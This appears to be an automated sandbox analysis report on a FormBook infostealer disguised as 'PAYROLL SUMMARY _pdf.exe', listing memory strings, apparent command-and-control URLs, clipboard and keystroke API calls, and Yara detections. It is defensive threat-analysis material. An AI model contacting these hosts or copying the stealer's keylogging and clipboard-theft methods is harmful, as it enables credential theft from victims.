Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 09 Aug 2024 06:43:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b

Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4608986123.0000000005781000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4608986123.0000000005781000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
Source: clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
Source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: clip.exe, 00000004.00000002.4600545677.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2516701698.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: clip.exe, 00000004.00000003.2516328003.0000000007A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: clip.exe, 00000004.00000002.4600545677.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: clip.exe, 00000004.00000002.4600545677.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/stats.png
Source: clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/get_simple_logo_klein.png
Source: clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png
Source: clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/pics/logos/icann.gif
Source: clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: clip.exe, 00000004.00000002.4608397493.00000000052E4000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000036A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.0000000006B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH
Source: clip.exe, 00000004.00000002.4608397493.00000000052E4000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000036A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2621909340.0000000006B64000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: clip.exe, 00000004.00000002.4608397493.000000000592C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000003CEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.networksolutions.com/
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
Source: clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_002C425A

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_002C4458

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

0_2_002C425A

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_002B0219

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_002DCDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
